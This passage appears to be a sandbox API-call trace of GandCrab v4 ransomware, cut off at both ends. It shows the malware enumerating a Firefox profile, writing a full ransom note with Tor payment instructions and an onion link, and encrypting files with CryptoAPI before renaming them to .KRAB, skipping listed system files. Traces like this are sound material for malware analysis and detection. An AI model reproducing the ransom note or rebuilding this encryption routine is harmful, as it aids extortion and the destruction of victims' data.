lpString2="..") returned 0 [0077.002] FindNextFileW (in: hFindFile=0x1023138, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0077.002] lstrcmpW (lpString1="8i341t8m.default", lpString2=".") returned 1 [0077.002] lstrcmpW (lpString1="8i341t8m.default", lpString2="..") returned 1 [0077.002] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0077.002] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\" [0077.002] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0077.002] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0077.003] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0077.003] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0077.003] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0077.003] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.003] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0077.003] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\\\KRAB-DECRYPT.txt") returned 97 [0077.003] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0077.006] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0077.007] WriteFile (in: hFile=0x774, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0077.007] CloseHandle (hObject=0x774) returned 1 [0077.008] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.008] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0077.023] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x18, wMilliseconds=0xe4)) [0077.023] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.023] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0077.023] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0077.024] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock") returned 103 [0077.024] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x774 [0077.026] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.027] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\") returned 80 [0077.027] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*" [0077.027] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0x10230f8 [0077.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.049] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.051] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.051] lstrcmpW (lpString1="addons.json", lpString2=".") returned 1 [0077.051] lstrcmpW (lpString1="addons.json", lpString2="..") returned 1 [0077.051] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json" [0077.051] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.055] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json.KRAB") returned 96 [0077.055] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0077.055] lstrlenW (lpString=".json") returned 5 [0077.055] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.055] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0077.055] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.055] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0077.056] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="desktop.ini") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="autorun.inf") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="ntuser.dat") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="iconcache.db") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="bootsect.bak") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="boot.ini") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="ntuser.dat.log") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="thumbs.db") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="KRAB-DECRYPT.html") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="ntldr") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="NTDETECT.COM") returned -1 [0077.056] lstrcmpiW (lpString1="addons.json", lpString2="Bootfont.bin") returned -1 [0077.056] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.056] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010820) returned 1 [0077.060] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.061] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.061] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.061] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0077.061] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0077.061] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.061] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10110a0) returned 1 [0077.065] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.086] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.086] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.086] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0077.086] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0077.086] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.086] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010a40) returned 1 [0077.090] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023678) returned 1 [0077.090] CryptGetKeyParam (in: hKey=0x1023678, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.091] CryptEncrypt (in: hKey=0x1023678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.091] GetLastError () returned 0x0 [0077.091] CryptDestroyKey (hKey=0x1023678) returned 1 [0077.091] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0077.091] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011700) returned 1 [0077.095] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023538) returned 1 [0077.095] CryptGetKeyParam (in: hKey=0x1023538, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.095] CryptEncrypt (in: hKey=0x1023538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.095] GetLastError () returned 0x0 [0077.095] CryptDestroyKey (hKey=0x1023538) returned 1 [0077.095] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0077.095] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x790 [0077.096] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0077.097] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0077.097] ReadFile (in: hFile=0x790, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x18, lpOverlapped=0x0) returned 1 [0077.230] SetFilePointerEx (in: hFile=0x790, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.230] WriteFile (in: hFile=0x790, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x18, lpOverlapped=0x0) returned 1 [0077.230] WriteFile (in: hFile=0x790, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0077.230] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.234] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.234] CloseHandle (hObject=0x790) returned 1 [0077.237] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.238] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\addons.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\addons.json.krab")) returned 1 [0077.239] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.239] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.239] lstrcmpW (lpString1="AlternateServices.txt", lpString2=".") returned 1 [0077.239] lstrcmpW (lpString1="AlternateServices.txt", lpString2="..") returned 1 [0077.239] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="AlternateServices.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt" [0077.239] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.242] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt.KRAB") returned 106 [0077.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0077.242] lstrlenW (lpString=".txt") returned 4 [0077.242] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.242] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0077.242] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0077.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="desktop.ini") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="autorun.inf") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ntuser.dat") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="iconcache.db") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="bootsect.bak") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="boot.ini") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ntuser.dat.log") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="thumbs.db") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="KRAB-DECRYPT.html") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ntldr") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="NTDETECT.COM") returned -1 [0077.243] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="Bootfont.bin") returned -1 [0077.243] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.244] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.244] lstrcmpW (lpString1="blocklist-addons.json", lpString2=".") returned 1 [0077.244] lstrcmpW (lpString1="blocklist-addons.json", lpString2="..") returned 1 [0077.244] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist-addons.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json" [0077.244] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.244] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json.KRAB") returned 106 [0077.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0077.245] lstrlenW (lpString=".json") returned 5 [0077.245] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.245] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0077.248] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.250] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0077.250] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="desktop.ini") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="autorun.inf") returned 1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", 